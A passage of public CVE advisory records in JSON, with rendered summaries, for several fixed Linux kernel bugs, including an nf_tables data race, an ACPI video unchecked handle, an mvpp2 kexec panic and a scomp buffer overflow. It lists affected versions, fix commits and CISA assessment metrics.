"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: Fix potential data-race in __nft_expr_type_get()\n\nnft_unregister_expr() can concurrent with __nft_expr_type_get(),\nand there is not any protection when iterate over nf_tables_expressions\nlist in __nft_expr_type_get(). Therefore, there is potential data-race\nof nf_tables_expressions list entry.\n\nUse list_for_each_entry_rcu() to iterate over nf_tables_expressions\nlist in __nft_expr_type_get(), and use rcu_read_lock() in the caller\nnft_expr_type_get() to protect the entire type query process."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:25.729Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/939109c0a8e2a006a6cc8209e262d25065f4403a"
},
{
"url": "https://git.kernel.org/stable/c/b38a133d37fa421c8447b383d788c9cc6f5cb34c"
},
{
"url": "https://git.kernel.org/stable/c/934e66e231cff2b18faa2c8aad0b8cec13957e05"
},
{
"url": "https://git.kernel.org/stable/c/0b6de00206adbbfc6373b3ae38d2a6f197987907"
},
{
"url": "https://git.kernel.org/stable/c/8d56bad42ac4c43c6c72ddd6a654a2628bf839c5"
},
{
"url": "https://git.kernel.org/stable/c/a9ebf340d123ae12582210407f879d6a5a1bc25b"
},
{
"url": "https://git.kernel.org/stable/c/01f1a678b05ade4b1248019c2dcca773aebbeb7f"
},
{
"url": "https://git.kernel.org/stable/c/f969eb84ce482331a991079ab7a5c4dc3b7f89bf"
}
],
"title": "netfilter: nf_tables: Fix potential data-race in __nft_expr_type_get()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27020",
"datePublished": "2024-05-01T05:30:15.908Z",
"dateReserved": "2024-02-19T14:20:24.209Z",
"dateUpdated": "2025-11-04T17:17:36.550Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-52693 (GCVE-0-2023-52693)
Vulnerability from cvelistv5
Published
2024-05-17 14:27
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ACPI: video: check for error while searching for backlight device parent
If acpi_get_parent() called in acpi_video_dev_register_backlight()
fails, for example, because acpi_ut_acquire_mutex() fails inside
acpi_get_parent), this can lead to incorrect (uninitialized)
acpi_parent handle being passed to acpi_get_pci_dev() for detecting
the parent pci device.
Check acpi_get_parent() result and set parent device only in case of success.
Found by Linux Verification Center (linuxtesting.org) with SVACE.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9661e92c10a9775243c1ecb73373528ed8725a10 Version: 9661e92c10a9775243c1ecb73373528ed8725a10 Version: 9661e92c10a9775243c1ecb73373528ed8725a10 Version: 9661e92c10a9775243c1ecb73373528ed8725a10 Version: 9661e92c10a9775243c1ecb73373528ed8725a10 Version: 9661e92c10a9775243c1ecb73373528ed8725a10 Version: 9661e92c10a9775243c1ecb73373528ed8725a10 Version: 9661e92c10a9775243c1ecb73373528ed8725a10 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:35.017Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/556f02699d33c1f40b1b31bd25828ce08fa165d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1e3a2b9b4039bb4d136dca59fb31e06465e056f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c4e1a0ef0b4782854c9b77a333ca912b392bed2f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a370502a5681986f9828e43be75ce26c6ab24af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2124c5bc22948fc4d09a23db4a8acdccc7d21e95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/39af144b6d01d9b40f52e5d773e653957e6c379c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/72884ce4e10417b1233b614bf134da852df0f15f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ccd45faf4973746c4f30ea41eec864e5cf191099"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52693",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:41:53.009768Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:18.888Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/acpi/acpi_video.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "556f02699d33c1f40b1b31bd25828ce08fa165d8",
"status": "affected",
"version": "9661e92c10a9775243c1ecb73373528ed8725a10",
"versionType": "git"
},
{
"lessThan": "1e3a2b9b4039bb4d136dca59fb31e06465e056f3",
"status": "affected",
"version": "9661e92c10a9775243c1ecb73373528ed8725a10",
"versionType": "git"
},
{
"lessThan": "c4e1a0ef0b4782854c9b77a333ca912b392bed2f",
"status": "affected",
"version": "9661e92c10a9775243c1ecb73373528ed8725a10",
"versionType": "git"
},
{
"lessThan": "3a370502a5681986f9828e43be75ce26c6ab24af",
"status": "affected",
"version": "9661e92c10a9775243c1ecb73373528ed8725a10",
"versionType": "git"
},
{
"lessThan": "2124c5bc22948fc4d09a23db4a8acdccc7d21e95",
"status": "affected",
"version": "9661e92c10a9775243c1ecb73373528ed8725a10",
"versionType": "git"
},
{
"lessThan": "39af144b6d01d9b40f52e5d773e653957e6c379c",
"status": "affected",
"version": "9661e92c10a9775243c1ecb73373528ed8725a10",
"versionType": "git"
},
{
"lessThan": "72884ce4e10417b1233b614bf134da852df0f15f",
"status": "affected",
"version": "9661e92c10a9775243c1ecb73373528ed8725a10",
"versionType": "git"
},
{
"lessThan": "ccd45faf4973746c4f30ea41eec864e5cf191099",
"status": "affected",
"version": "9661e92c10a9775243c1ecb73373528ed8725a10",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/acpi/acpi_video.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.39"
},
{
"lessThan": "2.6.39",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "2.6.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: video: check for error while searching for backlight device parent\n\nIf acpi_get_parent() called in acpi_video_dev_register_backlight()\nfails, for example, because acpi_ut_acquire_mutex() fails inside\nacpi_get_parent), this can lead to incorrect (uninitialized)\nacpi_parent handle being passed to acpi_get_pci_dev() for detecting\nthe parent pci device.\n\nCheck acpi_get_parent() result and set parent device only in case of success.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:45.802Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/556f02699d33c1f40b1b31bd25828ce08fa165d8"
},
{
"url": "https://git.kernel.org/stable/c/1e3a2b9b4039bb4d136dca59fb31e06465e056f3"
},
{
"url": "https://git.kernel.org/stable/c/c4e1a0ef0b4782854c9b77a333ca912b392bed2f"
},
{
"url": "https://git.kernel.org/stable/c/3a370502a5681986f9828e43be75ce26c6ab24af"
},
{
"url": "https://git.kernel.org/stable/c/2124c5bc22948fc4d09a23db4a8acdccc7d21e95"
},
{
"url": "https://git.kernel.org/stable/c/39af144b6d01d9b40f52e5d773e653957e6c379c"
},
{
"url": "https://git.kernel.org/stable/c/72884ce4e10417b1233b614bf134da852df0f15f"
},
{
"url": "https://git.kernel.org/stable/c/ccd45faf4973746c4f30ea41eec864e5cf191099"
}
],
"title": "ACPI: video: check for error while searching for backlight device parent",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52693",
"datePublished": "2024-05-17T14:27:26.514Z",
"dateReserved": "2024-03-07T14:49:46.889Z",
"dateUpdated": "2025-05-04T07:41:45.802Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35837 (GCVE-0-2024-35837)
Vulnerability from cvelistv5
Published
2024-05-17 14:02
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: mvpp2: clear BM pool before initialization
Register value persist after booting the kernel using
kexec which results in kernel panic. Thus clear the
BM pool registers before initialisation to fix the issue.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3f518509dedc99f0b755d2ce68d24f610e3a005a Version: 3f518509dedc99f0b755d2ce68d24f610e3a005a Version: 3f518509dedc99f0b755d2ce68d24f610e3a005a Version: 3f518509dedc99f0b755d2ce68d24f610e3a005a Version: 3f518509dedc99f0b755d2ce68d24f610e3a005a Version: 3f518509dedc99f0b755d2ce68d24f610e3a005a |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35837",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T17:16:07.925657Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:54.936Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.378Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/83f99138bf3b396f761600ab488054396fb5768f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af47faa6d3328406038b731794e7cf508c71affa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cec65f09c47d8c2d67f2bcad6cf05c490628d1ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/938729484cfa535e9987ed0f86f29a2ae3a8188b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dc77f6ab5c3759df60ff87ed24f4d45df0f3b4c4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9f538b415db862e74b8c5d3abbccfc1b2b6caa38"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "83f99138bf3b396f761600ab488054396fb5768f",
"status": "affected",
"version": "3f518509dedc99f0b755d2ce68d24f610e3a005a",
"versionType": "git"
},
{
"lessThan": "af47faa6d3328406038b731794e7cf508c71affa",
"status": "affected",
"version": "3f518509dedc99f0b755d2ce68d24f610e3a005a",
"versionType": "git"
},
{
"lessThan": "cec65f09c47d8c2d67f2bcad6cf05c490628d1ec",
"status": "affected",
"version": "3f518509dedc99f0b755d2ce68d24f610e3a005a",
"versionType": "git"
},
{
"lessThan": "938729484cfa535e9987ed0f86f29a2ae3a8188b",
"status": "affected",
"version": "3f518509dedc99f0b755d2ce68d24f610e3a005a",
"versionType": "git"
},
{
"lessThan": "dc77f6ab5c3759df60ff87ed24f4d45df0f3b4c4",
"status": "affected",
"version": "3f518509dedc99f0b755d2ce68d24f610e3a005a",
"versionType": "git"
},
{
"lessThan": "9f538b415db862e74b8c5d3abbccfc1b2b6caa38",
"status": "affected",
"version": "3f518509dedc99f0b755d2ce68d24f610e3a005a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.17"
},
{
"lessThan": "3.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: mvpp2: clear BM pool before initialization\n\nRegister value persist after booting the kernel using\nkexec which results in kernel panic. Thus clear the\nBM pool registers before initialisation to fix the issue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:31.831Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/83f99138bf3b396f761600ab488054396fb5768f"
},
{
"url": "https://git.kernel.org/stable/c/af47faa6d3328406038b731794e7cf508c71affa"
},
{
"url": "https://git.kernel.org/stable/c/cec65f09c47d8c2d67f2bcad6cf05c490628d1ec"
},
{
"url": "https://git.kernel.org/stable/c/938729484cfa535e9987ed0f86f29a2ae3a8188b"
},
{
"url": "https://git.kernel.org/stable/c/dc77f6ab5c3759df60ff87ed24f4d45df0f3b4c4"
},
{
"url": "https://git.kernel.org/stable/c/9f538b415db862e74b8c5d3abbccfc1b2b6caa38"
}
],
"title": "net: mvpp2: clear BM pool before initialization",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35837",
"datePublished": "2024-05-17T14:02:32.070Z",
"dateReserved": "2024-05-17T13:50:33.103Z",
"dateUpdated": "2025-05-04T09:06:31.831Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52612 (GCVE-0-2023-52612)
Vulnerability from cvelistv5
Published
2024-03-18 10:07
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
crypto: scomp - fix req->dst buffer overflow
The req->dst buffer size should be checked before copying from the
scomp_scratch->dst to avoid req->dst buffer overflow problem.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 Version: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 Version: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 Version: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 Version: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 Version: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 Version: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 Version: 1ab53a77b772bf7369464a0e4fa6fd6499acf8f1 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52612",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-18T15:42:02.603013Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:24:15.790Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.332Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1142d65c5b881590962ad763f94505b6dd67d2fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e0e3f4a18784182cfe34e20c00eca11e78d53e76"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4518dc468cdd796757190515a9be7408adc8911e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a5f2f91b3fd7387e5102060809316a0f8f0bc625"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4df0c942d04a67df174195ad8082f6e30e7f71a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d9e5bed036a7f9e2062a137e97e3c1e77fb8759"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/71c6670f9f032ec67d8f4e3f8db4646bf5a62883"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/744e1885922a9943458954cfea917b31064b4131"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"crypto/scompress.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1142d65c5b881590962ad763f94505b6dd67d2fe",
"status": "affected",
"version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
"versionType": "git"
},
{
"lessThan": "e0e3f4a18784182cfe34e20c00eca11e78d53e76",
"status": "affected",
"version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
"versionType": "git"
},
{
"lessThan": "4518dc468cdd796757190515a9be7408adc8911e",
"status": "affected",
"version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
"versionType": "git"
},
{
"lessThan": "a5f2f91b3fd7387e5102060809316a0f8f0bc625",
"status": "affected",
"version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
"versionType": "git"
},
{
"lessThan": "4df0c942d04a67df174195ad8082f6e30e7f71a5",
"status": "affected",
"version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
"versionType": "git"
},
{
"lessThan": "7d9e5bed036a7f9e2062a137e97e3c1e77fb8759",
"status": "affected",
"version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
"versionType": "git"
},
{
"lessThan": "71c6670f9f032ec67d8f4e3f8db4646bf5a62883",
"status": "affected",
"version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
"versionType": "git"
},
{
"lessThan": "744e1885922a9943458954cfea917b31064b4131",
"status": "affected",
"version": "1ab53a77b772bf7369464a0e4fa6fd6499acf8f1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"crypto/scompress.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: scomp - fix req-\u003edst buffer overflow\n\nThe req-\u003edst buffer size should be checked before copying from the\nscomp_scratch-\u003edst to avoid req-\u003edst buffer overflow problem."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:52.034Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1142d65c5b881590962ad763f94505b6dd67d2fe"
},
{
"url": "https://git.kernel.org/stable/c/e0e3f4a18784182cfe34e20c00eca11e78d53e76"
},
{
"url": "https://git.kernel.org/stable/c/4518dc468cdd796757190515a9be7408adc8911e"
},
{
"url": "https://git.kernel.org/stable/c/a5f2f91b3fd7387e5102060809316a0f8f0bc625"
},
{
"url": "https://git.kernel.org/stable/c/4df0c942d04a67df174195ad8082f6e30e7f71a5"
},
{
